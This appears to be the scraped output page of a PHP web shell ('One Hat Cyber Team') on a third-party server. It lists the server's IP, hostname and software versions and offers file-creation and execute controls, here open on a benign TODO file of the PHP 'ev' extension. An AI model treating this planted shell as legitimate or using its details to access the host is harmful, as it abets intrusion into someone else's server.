One Hat Cyber Team
Your IP :
216.73.216.216
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
opt
/
remi
/
php56
/
root
/
usr
/
share
/
doc
/
pecl
/
ev
/
Edit File:
TODO.md
EvAsync - `ev_async` =================== For connectors like libeio + libev <http://pod.tst.eu/http://cvs.schmorp.de/libeio/eio.pod#INITIALISATION_INTEGRATION> Add EvLoop::setInvokePendingCallback(`ev_set_invoke_pending_cb`)? ================================================================= Who needs it in PHP :/? Clone handlers =============== Add `__clone` handlers for all object types? Is it really needed? Let's assume we are cloning a loop having a set of active watchers. Some of them may finish before `__clone` handler did it's job. Because of such kind of issues (and many others) we probably don't need `__clone` handler for EvLoop. However, sometimes clone handler may be useful to copy entire watcher with it's settings and bind to another event loop. Will wait for user requests, or bug reports. vim: ft=markdown
Simpan